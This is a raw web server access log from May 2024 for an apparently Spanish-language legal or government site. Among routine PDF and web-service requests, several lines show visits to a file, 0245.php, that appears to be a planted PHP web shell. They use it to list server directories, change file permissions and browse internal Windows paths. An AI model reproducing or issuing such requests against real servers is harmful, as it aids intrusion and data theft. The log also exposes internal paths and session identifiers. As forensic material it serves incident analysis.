47.128.114.121 - - [21/May/2024:01:00:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.114.121 - - [21/May/2024:01:00:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_swf HTTP/1.1" 200 254
201.245.192.253 - - [21/May/2024:01:00:18 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66826510794084087a689b1c31a1f3ad8.e3iSbxaKaheRe34Nb3yMbhiSbxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/May/2024:01:00:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/May/2024:01:00:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 35554
47.128.60.199 - - [21/May/2024:01:00:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=fsbuff&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2022%5C HTTP/1.1" 200 2705
201.245.192.253 - - [21/May/2024:01:00:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62840b3333a9e4d5b98f0d30ba0d9434a.e3iSbxaKaheRe34Nb3yMbhiSbxr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.60.172 - - [21/May/2024:01:00:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=tools&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2007%5C HTTP/1.1" 200 3062
216.244.66.195 - - [21/May/2024:01:00:43 -0500] "GET /robots.txt HTTP/1.1" 404 1018
47.128.34.25 - - [21/May/2024:01:00:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5Cphpscripts%5CScripts&sort=2a HTTP/1.1" 200 3423
47.128.34.25 - - [21/May/2024:01:00:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.34.25 - - [21/May/2024:01:00:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_js HTTP/1.1" 200 131
47.128.36.143 - - [21/May/2024:01:01:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5Ckmz&f=vallas_otorgadas_marzo2014.kmz HTTP/1.1" 200 2872
201.245.192.253 - - [21/May/2024:01:01:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.25.234 - - [21/May/2024:01:01:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CAutoliquidacion%5CSolicitudes+relacionadas+con+calidad+del+aire+auditiva+y+visual%5CEvaluaci%F3n+certificado+de+Intensidad+Auditiva%5C&sort=0a HTTP/1.1" 200 3553
47.128.25.234 - - [21/May/2024:01:01:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.25.234 - - [21/May/2024:01:01:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
172.22.2.4 - - [21/May/2024:01:01:25 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%203%20del%2020%20de%20Mayo%20de%202014.pdf HTTP/1.1" 200 504420
172.22.2.4 - - [21/May/2024:01:01:25 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%205%20del%2026%20de%20Diciembre%20de%202014.pdf HTTP/1.1" 200 3424865
172.22.2.4 - - [21/May/2024:01:01:25 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000003%20DEL%2021%20DE%20FEBRERO%20DEL%202023.pdf HTTP/1.1" 200 355302
172.22.2.4 - - [21/May/2024:01:01:25 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%2011%20del%2027%20de%20Diciembre%20de%202011.pdf HTTP/1.1" 200 303527
